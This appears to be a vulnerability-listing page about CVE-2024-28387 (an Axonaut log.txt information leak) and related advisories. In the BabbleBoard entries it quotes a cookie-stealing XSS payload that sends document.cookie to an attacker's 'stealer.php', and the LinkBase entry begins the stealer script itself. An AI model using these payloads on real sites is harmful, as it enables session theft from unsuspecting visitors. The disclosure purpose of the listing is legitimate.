CVE-2024-28387

An issue in axonaut v.3.1.23 and before allows a remote attacker to obtain sensitive information via the log.txt component...

Axonaut 安全漏洞

Axonaut is a compliant, comprehensive and fully managed software from Axonaut. A security vulnerability exists in Axonaut v.3.1.23 and prior versions, which originated from a vulnerability that allows remote attackers to obtain sensitive information via the log.txt component...

CVE-2024-28387

CVE-2024-28387 — Axonaut : An issue in Axonaut v3.1.23 and earlier allows a remote attacker to obtain sensitive information via the log.txt component. The vulnerability affects the log.txt handling and, per sources, is classified with high impact (confidentiality impact). No official patch/versio...

PT-2024-22406 · Axonaut · Axonaut

Name of the Vulnerable Software and Affected Versions: axonaut versions 3.1.23 and earlier Description: An issue in axonaut allows a remote attacker to obtain sensitive information via the log.txt component. Recommendations: For axonaut versions 3.1.23 and earlier, consider restricting access to...

CVE-2024-28387

An issue in axonaut v.3.1.23 and before allows a remote attacker to obtain sensitive information via the log.txt component...

CVE-2024-28387

An issue in axonaut v.3.1.23 and before allows a remote attacker to obtain sensitive information via the log.txt component...

CVE-2018-7204

inc/logger.php in the Giribaz File Manager plugin before 5.0.2 for WordPress logged activity related to the plugin in /wp-content/uploads/file-manager/log.txt. If a user edits the wp-config.php file using this plugin, the wp-config.php contents get added to log.txt, which is not protected and...

File Manager <= 5.0.0 - Information Disclosure

The Giribaz File Manager plugin logged activity related to the plugin in /wp-content/uploads/file-manager/log.txt. If user edits wp-config.php file using this plugin, the wp-config.php contents get added to the file which is not protected and contains database credentials, salts, etc. These files...

New Attack Targeting Microsoft Outlook Web App (OWA) to Steal Email Passwords

Researchers have unearthed a dangerous backdoor in Microsoft's Outlook Web Application OWA that has allowed hackers to steal e-mail authentication credentials from major organizations. The Microsoft Outlook Web Application or OWA is an Internet-facing webmail server that is being deployed in...

LinkBase 2.0 - Remote Cookie Grabber Vulnerability

No description provided by source. + Download LinkBase 2.0 Cookie Grabber Exploit + Discovered By SirGod + www.mortal-team.net + www.h4cky0u.org + Greetz : All my friends + Make 2 files and upload to your host : stealer.php - Put the following code into the file : ?php $cookie = $GET'cookie'; $lo...

freepost 0.1 r1 - Multiple Vulnerabilities

Exploit FreePost 0.1 R1 SQL Injection Date: June 6nd 2012 Author: ThE g0bL!N Version: 0.1 R1 Vendor Url: http://www.phpbrasil.com/script/dYRoLbwWuzR/freepost-01-r1 Tested on: Xp Service Pack 2 Greets To : Lider Pirata , Yassine Tablouche , Ilyes , Bilal , Habib, Djamal , Boukhors .. etc Exploit:...

BabbleBoard 1.1.6 XSRF

BabbleBoard v1.1.6 Cookie Grabber Exploit/CSRF + Discovered By SirGod + Greetz : All my friends + Cookie Grabber Exploit - Steal the cookie of any visitor. 1.Register as : document.location ="http://yourdomain/path/stealer.php?cookie=" + document.cookie; Everyone who visit the index page will be...

BabbleBoard 1.1.6 (username) CSRF/Cookie Grabber Exploit

No description provided by source. + BabbleBoard v1.1.6 Cookie Grabber Exploit/CSRF + Discovered By SirGod + Greetz : All my friends + Cookie Grabber Exploit - Steal the cookie of any visitor. 1.Register as : scriptdocument.location ="http://yourdomain/path/stealer.php?cookie=" +...